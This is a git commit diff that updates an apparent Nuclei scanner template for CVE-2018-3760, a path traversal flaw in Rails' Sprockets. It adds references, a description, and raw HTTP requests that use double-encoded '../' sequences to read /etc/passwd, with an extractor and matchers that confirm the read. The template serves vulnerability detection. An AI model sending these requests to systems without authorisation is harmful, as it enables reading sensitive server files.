Merge pull request #2108 from pikpikcu/patch-200

Update CVE-2018-3760.yaml
2021-07-20 17:28:43 +05:30 · 2021-07-20 17:28:43 +05:30 · 60c0650a3f
parent 7020d17f13 f2c22f66b6
commit 60c0650a3f
1 changed files with 33 additions and 9 deletions
--- a/cves/2018/CVE-2018-3760.yaml
+++ b/cves/2018/CVE-2018-3760.yaml
@ -1,22 +1,46 @@
 id: CVE-2018-3760

 info:
-  name: Rails CVE-2018-3760
-  author: 0xrudra
+  name: Ruby On Rails Path Traversal
+  author: 0xrudra,pikpikcu
  severity: high
+  reference: |
+    - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760
+    - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
+    - https://seclists.org/oss-sec/2018/q2/210
+    - https://xz.aliyun.com/t/2542
+  description: |
+    Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files.
+    There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server.
  tags: cve,cve2018,rails,lfi

 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
+  - raw:
+      - |
+        GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+        Content-Length: 94
+
+      - |
+        GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+
+    extractors:
+      - type: regex
+        name: path
+        internal: true
+        part: body
+        regex:
+          - "/etc/passwd is no longer under a load path: (.*?),"

    matchers-condition: and
    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
      - type: status
        status:
          - 200
-      - type: regex
-        regex:
-          - "root:[x*]:0:0:"
-        part: body